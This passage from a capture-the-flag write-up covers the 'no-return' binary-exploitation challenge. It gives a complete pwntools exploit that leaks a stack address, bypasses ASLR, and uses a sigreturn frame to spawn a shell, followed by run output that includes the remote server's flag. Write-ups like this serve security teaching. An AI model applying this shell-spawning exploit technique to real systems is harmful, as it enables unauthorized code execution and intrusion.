    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0x7fffffffe6e8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(0, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0x7fffffffe700)   # rsp

    p.send(payload)
    p.recv()

    p.interactive()

And it works:

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1192591
[*] Switching to interactive mode
$ ls
no-return  solve.py

Enabling ASLR

Now we need to turn on ASLR and bypass it. This can be done with the stack address leaks we have. Before enabling ASLR, let’s compute the addresses as an offset to the first leak. For that, I will take the first iteration outside the loop:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    stack_leak = send_data(p, data, offset)
    log.info(f'Stack address leak: {hex(stack_leak)}')

    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0x7fffffffe6f0 - 1)  # rdi
    data += p64(0)                   # rsi
    data += p64(0)                   # rbp
    data += p64(0xf)                 # rdx
    data += p64(0x7fffffffe6f8)      # rcx
    data += p64(0)                   # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0x7fffffffe6e8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0x7fffffffe700)   # rsp

    p.send(payload)
    p.recv()

    p.interactive()

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1194870
[*] Stack address leak: 0x7fffffffe7a0
[*] Switching to interactive mode
$ ls
no-return  solve.py

These are the offsets to this stack leak:

$ python3 -q
>>> stack_leak = 0x7fffffffe7a0
>>> 0x7fffffffe6f0 - stack_leak
-176
>>> 0x7fffffffe6f8 - stack_leak
-168
>>> 0x7fffffffe6e8 - stack_leak
-184
>>> 0x7fffffffe700 - stack_leak
-160

We can even express them relative to stack_leak - offset, where offset is 176:

>>> offset = 176
>>> 0x7fffffffe6f0 - (stack_leak - offset)
0
>>> 0x7fffffffe6f8 - (stack_leak - offset)
8
>>> 0x7fffffffe6e8 - (stack_leak - offset)
-8
>>> 0x7fffffffe700 - (stack_leak - offset)
16
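
The same arithmetic can be wrapped in a small helper, which makes it easy to check against the hard-coded addresses before touching the exploit. This is only a sketch; resolve_addresses and its dictionary keys are hypothetical names, not part of the original script.

```python
def resolve_addresses(stack_leak: int, offset: int = 176) -> dict:
    """Derive the four stack addresses used by the exploit from the first leak."""
    base = stack_leak - offset
    return {
        'binsh': base - 8,        # where "/bin/sh\0" is stored
        'gadget_ptr': base,       # slot holding 0x40105a
        'syscall_ptr': base + 8,  # slot holding 0x401099
        'pivot': base + 16,       # new rsp: slot holding the value for rdi
    }


addresses = resolve_addresses(0x7fffffffe7a0)
for name, value in addresses.items():
    print(f'{name}: {hex(value)}')
```

With the leak from the ASLR-disabled run, this gives back 0x7fffffffe6e8, 0x7fffffffe6f0, 0x7fffffffe6f8 and 0x7fffffffe700.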

So this is the updated exploit:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    stack_leak = send_data(p, data, offset)
    log.info(f'Stack address leak: {hex(stack_leak)}')

    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(stack_leak - offset - 1)      # rdi
    data += p64(0)                            # rsi
    data += p64(0)                            # rbp
    data += p64(0xf)                          # rdx
    data += p64(stack_leak - offset + 8)      # rcx
    data += p64(0)                            # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = stack_leak - offset - 8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(stack_leak - offset + 16)  # rsp

    p.send(payload)
    p.recv()

    p.interactive()

We can run it locally with ASLR enabled:

# echo 2 | tee /proc/sys/kernel/randomize_va_space
2

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 891062
[*] Stack address leak: 0x7ffd133ea7e0
[*] Switching to interactive mode
$ ls
no-return  solve.py

Flag

Alright, now let’s run it against the remote server:

$ python3 solve.py 157.245.46.136:31468
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 157.245.46.136 on port 31468: Done
[*] Stack address leak: 0x7ffeff950900
[*] Switching to interactive mode
$ ls
11a866b981670122c056ee96ebb0796910a7495dc3ee2368fd127626af9e1b16-flag.txt
no-return
run_challenge.sh
$ cat 11a866b981670122c056ee96ebb0796910a7495dc3ee2368fd127626af9e1b16-flag.txt
HTB{y0uv3_35c4p3d_7h3_v01d_0f_n0_r37urn}

The full exploit code is here: solve.py.